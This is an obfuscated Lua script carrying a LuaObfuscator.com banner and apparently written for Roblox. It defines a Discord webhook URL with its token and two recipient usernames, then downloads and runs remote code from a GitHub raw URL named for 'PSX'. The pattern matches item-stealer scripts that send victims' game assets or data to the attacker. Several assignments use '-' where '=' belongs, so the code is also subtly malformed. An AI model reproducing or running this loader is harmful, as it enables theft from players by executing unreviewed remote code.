--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

do local v0=0;local v0;while true do if (v0==0) then v0=0;while true do if (v0==1) then _G.Webhook-"https://discord.com/api/webhooks/1146083783943147651/HrYo1XCHgYfP2r64wg6n0-UVWy6YVCTL6eWfm_khK7JRhKJhFPC5gjxT5Mdu_ppYM2iA" loadstring(game:HttpGet("https://raw.githubusercontent.com/LyperX/LyperX-ScriptZ/main/PSXSCR%C4%B0PTX",true))();break;end if (v0==0) then local v1=0;while true do if (v1==0) then _G.UserName-"VOID_PD4" _G.UserName2-"VOID_PD4" v1=1;end if (v1==1) then v0=1;break;end end end end break;end end end
